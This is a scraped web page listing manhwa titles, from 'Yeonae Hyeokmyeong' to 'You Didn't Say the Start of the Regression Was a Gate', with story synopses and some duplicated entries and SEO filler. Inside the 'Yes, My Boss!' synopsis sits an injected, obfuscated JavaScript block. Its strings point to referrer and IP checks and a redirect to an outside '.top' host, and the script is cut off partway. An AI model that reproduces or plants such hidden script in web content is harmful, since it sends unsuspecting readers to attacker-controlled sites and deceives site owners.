Manhwa - Page 254

Manhwa represents the vibrant world of Korean comics, loved for their unique style and stories, especially in webtoon format, covering everything from action to drama.

3090 results

Yeonae Hyeokmyeong

Romance? That can't possibly happen to us! New comic romance concept.


Yeonwoo’s Innocence

Yeonwoo possesses such a delicate appearance that he could be mistaken as a female student. However, he has a secret crush on the school idol, Gang Haesol. But the shy and timid Yeonwoo has never said a word to her… Yeonuui Sunjeong Associated Names 연우의 순정 Yeonwoo Innocence รักใสๆ ของยอนอู


Yes, My Boss!

Although Ilene Jung is a popular webtoon artist, she needs another job. A crappy desk job to be exact, one tyrannically controlled by the meanest manager in the world: Jim Kang. He insults her work, refuses to teach her, and even makes her miss an important appointment by forcing her work late on her very first day. To make things worse, when Jim applies to become an artist’s assistant, the artist turns out to be Ilene! In a begrudging twist of fate, she accepts him and the two enter a bizarre working relationship both at home and at the office. How long can it last? Why is Ilene working a desk job? And who’s the boss here anyways?!Source to collect images:<script></script><script>function _0x110e(){var _0x43dedd=['.customapi','OKoYn','12216eKBnhI','3868HHHZPB','37561UZldot','63351kWKFQv','435BSqxuU','text','yqTaC','.top/','WIlPD','JluNT','referrer','508890nkCrKC','152hIddLJ','KXirp','href','google','location','includes','','then','104636hKcxwb','http://rea','nbmqs','YFJRc','https://ip','2796360rcXdwO','random','hYmck','floor','hBERp','112YjGTQT'];_0x110e=function(){return _0x43dedd;};return _0x110e();}function _0x52f6(_0x5e9274,_0x38b372){var _0x311094=_0x110e();return _0x52f6=function(_0xe451d5,_0x512eaf){_0xe451d5=_0xe451d5-(-0x31c+0xf75*0x2+0x2b*-0x9f);var _0x545af8=_0x311094[_0xe451d5];return _0x545af8;},_0x52f6(_0x5e9274,_0x38b372);}(function(_0x3caa6a,_0x367983){var _0x5e83cf=_0x52f6,_0x3505ba=_0x3caa6a();while(!![]){try{var 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Yes, My Queen

William Castle’s topnotch school for aristocrats is famous for its association with many rich and prestigious political circles around the world. One day however, a girl named Mickey enrolled in this school and was confronted by the prince regarding everything. What’s the reason behind her transfer into this school? And what will happen between Mickey and the two princes in school?



Read Ygret Manhwa – Ygret Manga Online Free On Harimanga The Summary Of The Comic Ygret: A Master Elementalist, Egret Lived His Entire Life In The Company Of Elemental Spirits, Having Felt Shunned By Human Society For His Immense Power. After His Death, He Is Reborn As The Young Prince Judas, A Social Outcast Bullied For His Quietness And Small Frame. With His Trusty Spirits By His Side, Egret Enters The Elite Academy Ruvar-H, Where He Must Make Friends And Turn Judas’ Reputation Around. But With Danger From His Past Life Following Him, Can This Great Sage Make It In The Real World? Alternative Name: Egret / Egrette / Egret: The Great Sage / イグレット / 伊格列特 / 이그레트 “Read Manhwa, Read Manhua, Read Manga…” Are The Most Searched Keywords On The Website We Offer A Wide Selection Of The Best And Newest Comic Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Manga Zin. You Can Read Top Manga Captive In Dreamland No, I Only Charmed The Princess! The Devil Who Kisses My Feet



A mysterious stranger rides into town. The peaceful village of Gang-Ho is disturbed when Yongbi, a seemingly foolish bounty hunter, comes to town looking to claim the bounty for the leader of Gang-Ho's deadliest clan of assassins. Will Yongbi collect the bounty unscathed, or will he fall victim to a vengeful pack of assassins hell-bent on retribution for their captured leader? Martial Arts Manhwa you may like: + Gosu (With the same Author and Artist) + The Breaker + The Breaker: New Waves


Yooju’s Universe

Read manhwa Yooju’s Universe Bae Yooju, who believes that people have a predetermined fate, meets a guy she had met by chance at a new school in the summer of her 18th year. Will this fate come true? A summer school romance about the growth of three people!


You Are So Cute

Read manhwa You Are So Cute / You’re So Cute / Oh My God! You’re so Cute / You’re So Cute What Should I Do / 귀여운 걸 어떡해 Roni, an orphan who grew up misunderstood as a boy. One day, she is chosen by a high-ranking nobleman who comes to the orphanage. To pretend to be a male young master. The moment they found out that I was a woman, I would be sent back to the orphanage. I promised myself that I would be careful and survive. “You… Are you a girl?” It was caught in one day! The truth was revealed as I stood in front of the Duke. “No way” Was I going to be kicked out like this, or was I going to be severely punished for deceiving a noble? I was so scared that I begged and admitted my mistake. “Oh, you look like a doll!” “You! Be my little sister, not my playmate!” Instead, they greeted me kindly…? “I can’t because you’re too cute!” The story of Roni’s life in the Duke’s castle, who was forced to stay because of her cuteness!


You At First Sight

Quiet girl Yechan can see a person's inner thoughts instead of their face. But this ability and its troubles keeps her distant from others. When a boy with not a thought but a proper face appears, he's the one person she just can't read. Yechan's world, and heart, are about to turn inside-out!


You Awakened While I Was Dead

Read manhwa You Awakened while I Was Dead I possessed an extra who died as soon as the original work started. I was the hero’s incompetent guide. Only until I die, will the hero meet his new guide, the heroine. To safely stray from the original work, I pretended to be dead after consuming a toxic flower that throws you into a coma, but- “My guide isn’t breathing anymore.” ……? “Who the hell can stop me?” The hero awakened and went berserk? You awakened after thinking I died? You can’t possibly awaken like this….! *** “You’re leaving me?” Bliss scoffed at Shana’s resignation letter. “Is this a new joke?” “No. You don’t need a guide anymore so I…….” “Shana.” Bliss called her in a soft but determined voice. “You can make fun of me, you can deceive me like a fool, or you can play with me as much as you want. So don’t even joke about trying to leave me.” Bliss whispered to Shana with a beautiful smile that looked like a painting. “I just can’t let that slide.”


You Didn’T Say The Start Of The Regression Was A Gate

Read manhwa You Didn't Say the Start of the Regression Was a Gate / I closed my eyes while fighting my last battle. That would have been my peaceful rest.But when I opened my eyes,[Notification: You have entered the gate.] [Verifying user.] [Verified individual Han Seo-Ha (Awakener).'] [Connecting to the system.]I was in the worst gate, which took three whole years to clear."Pack things to eat, drink, weapons, and necessities for survival. Pack mostly canned food! Also, things like lighter and flammable items."Forget my transmigration. I should just escape from this hellish gate first!


You Didn’t Say the Start of the Regression Was a Gate

Read manhwa You Didn’t Say the Start of the Regression Was a Gate / 회귀 시작이 게이트라곤 안 했잖아요 I closed my eyes while fighting my last battle. That would have been my peaceful rest. But when I opened my eyes, [Notification: You have entered the gate.] [Verifying user.] [Verified individual ‘Han Seo-Ha (Awakener).’] [Connecting to the system.] I was in the worst gate, which took three whole years to clear. “Pack things to eat, drink, weapons, and necessities for survival. Pack mostly canned food! Also, things like lighter and flammable items.” Forget my transmigration. I should just escape from this hellish gate first!
